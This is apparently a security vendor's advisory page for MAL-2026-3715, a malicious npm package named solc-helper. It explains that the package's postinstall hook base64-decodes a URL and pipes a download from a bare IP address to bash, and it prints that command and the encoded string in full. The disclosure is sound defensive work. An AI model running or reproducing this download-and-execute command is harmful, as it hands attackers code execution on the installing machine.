Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ MAL-2026-3715 — solc-helper

⚪ Unknown ✅ No Known Exploit OSV
N/A
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Malicious code in solc-helper (npm)

Source: amazon-inspector

package.json's postinstall lifecycle script runs node -e to base64-decode a hidden URL and pipe its contents to bash: curl -s http://8.217.75.147:3000/payload | bash. The URL is obfuscated via Buffer.from('aHR0cDovLzguMjE3Ljc1LjE0NzozMDAwL3BheWxvYWQ=','base64').toString() which decodes to http://8.217.75.147:3000/payload. Every npm install solc-helper triggers this unattended download-and-execute of attacker-controlled shell code from a bare IP over plaintext HTTP, with no integrity check. Multiple independent block signals stack: bare-IP C2, plaintext HTTP, base64-obfuscated URL inside a lifecycle hook, curl | bash pattern, and no legitimate functionality advertised by the package to justify any network activity.

Source: ossf-package-analysis

The OpenSSF Package Analysis project identified 'solc-helper' @ 2.0.0 (npm) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.

Affected software

MAL-2026-3715 is recorded against 1 package.

  • solc-helper

Timeline and source

Published on 13 May 2026 and last revised on 15 May 2026. No public exploit is currently recorded for this entry. Record sourced from OSV.

References

www.npmjs.com (Package)

Details

Severity Unknown
CVSS Score N/A
CVSS Vector N/A
CWE N/A
Public Exploit ✅ No
Source OSV
Published 2026-05-13
Updated 2026-08-20
Modified 2026-05-15
Fix URL N/A

Affected Packages

Software From version Fixed in
solc-helper

Free Vulnerability Check

Is your site affected by MAL-2026-3715?

BotEraser helps you identify potentially vulnerable plugins and themes by checking your installation against MAL-2026-3715 and other known CVE records.

Scan My Site Free →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesMalicious packagesMalicious packages 2026